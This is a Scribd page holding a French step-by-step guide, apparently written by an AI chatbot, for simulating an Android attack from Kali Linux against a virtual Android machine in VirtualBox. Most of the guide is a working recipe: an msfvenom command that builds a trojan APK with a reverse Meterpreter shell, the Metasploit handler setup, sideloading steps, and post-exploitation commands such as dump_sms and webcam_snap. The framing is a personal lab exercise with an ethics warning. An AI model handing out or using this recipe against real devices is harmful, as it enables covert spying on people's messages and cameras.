0% ont trouvé ce document utile (0 vote)
6 vues2 pages

Attaque Android depuis Windows 11 VM

Ce document décrit un guide étape par étape pour simuler une attaque Android depuis Kali Linux vers une machine Android virtuelle, en utilisant VirtualBox sur Windows 11. Il couvre les prérequis, la création d'une machine virtuelle Android, la configuration du réseau, la création d'un APK malveillant avec Metasploit, et l'installation de l'APK sur la VM Android pour établir un contrôle via Meterpreter. Le document souligne l'importance de n'utiliser ces compétences qu'à des fins de cybersécurité et de défense.

Transféré par

safaemaazouzi59
Copyright
© All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats TXT, PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
6 vues2 pages

Attaque Android depuis Windows 11 VM

Ce document décrit un guide étape par étape pour simuler une attaque Android depuis Kali Linux vers une machine Android virtuelle, en utilisant VirtualBox sur Windows 11. Il couvre les prérequis, la création d'une machine virtuelle Android, la configuration du réseau, la création d'un APK malveillant avec Metasploit, et l'installation de l'APK sur la VM Android pour établir un contrôle via Meterpreter. Le document souligne l'importance de n'utiliser ces compétences qu'à des fins de cybersécurité et de défense.

Transféré par

safaemaazouzi59
Copyright
© All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats TXT, PDF, TXT ou lisez en ligne sur Scribd

Parfait !

🙌 Tu vas apprendre légalement à simuler une attaque Android depuis Kali


Linux (ton attaquant) vers une machine Android (ta victime) — tout en gardant le
contrôle total de l’environnement. Voici comment faire étape par étape, même depuis
Windows 11 avec VirtualBox.

🔧 Ce dont tu as besoin
Sur ta machine hôte (Windows 11) :
✅ VirtualBox installé
✅ Extension Pack VirtualBox (important pour réseau et USB)
✅ Kali Linux (déjà installé ✅)
⬇️ Télécharger une VM Android x86 ou utiliser Genymotion

🧱 Étape 1 : Télécharger une machine Android virtuelle


Option 1 : Android x86 ISO (gratuit)
🔗 [Link]

Choisis la dernière version stable (ISO)

Tu vas l’installer comme une VM normale sur VirtualBox

Option 2 : Genymotion (plus simple mais inscription requise)


🔗 [Link]

Permet d’émuler plusieurs modèles Android

Gratuit pour un usage personnel

Étape 2 : Créer la VM Android (sur VirtualBox)


Ouvre VirtualBox → Nouvelle VM

Nom : Android

Type : Linux — Version : Other Linux (64-bit)

RAM : 2048 Mo (ou +)

Disque dur : VDI, Dynamique, 8 Go ou +

Démarre la VM → choisis l’ISO Android x86

Suis l’installation classique (comme un OS normal)

Démarre Android — tu as maintenant un “téléphone virtuel” ! 📱

🔌 Étape 3 : Connecter Kali & Android au même réseau


Dans VirtualBox :

Réseau de Kali → Adaptateur Reseau : Reseau NAT ou Reseau interne

Réseau de Android → même configuration

⚠️ Tu peux aussi choisir “Réseau ponté” si tu veux qu’ils soient sur le même réseau
local que ton PC.

🧨 Étape 4 : Créer un APK malveillant avec Kali


Sur Kali, dans le terminal :

bash
Copy
Edit
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4444 -o
[Link]
Remplace 192.168.x.x par l’IP locale de Kali (trouve-la avec ip a).

🎯 Étape 5 : Lancer Metasploit et attendre la connexion


bash
Copy
Edit
msfconsole
Puis dans Metasploit :

bash
Copy
Edit
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.x.x
set LPORT 4444
exploit
Tu attends que la victime lance l’APK.

📲 Étape 6 : Installer l’APK sur la VM Android


Glisse l’[Link] dans Android

Active “Sources inconnues” dans les paramètres

Installe l’APK

Quand elle est ouverte → BAM 💥 tu as une session dans Metasploit

Étape 7 : Contrôle via Meterpreter (sécurité offensive)


Voici quelques commandes Meterpreter que tu peux tester :

bash
Copy
Edit
sysinfo
shell
dump_sms
webcam_list
webcam_snap
✅ Résumé
Élément Rôle
Kali Linux Attaquant
Android VM Cible "victime"
APK généré Cheval de Troie
Metasploit Serveur d'écoute

🔒 À retenir :
Tu apprends pour la cybersécurité et la défense. Ne jamais utiliser ce savoir con

Attach

Search

Vous aimerez peut-être aussi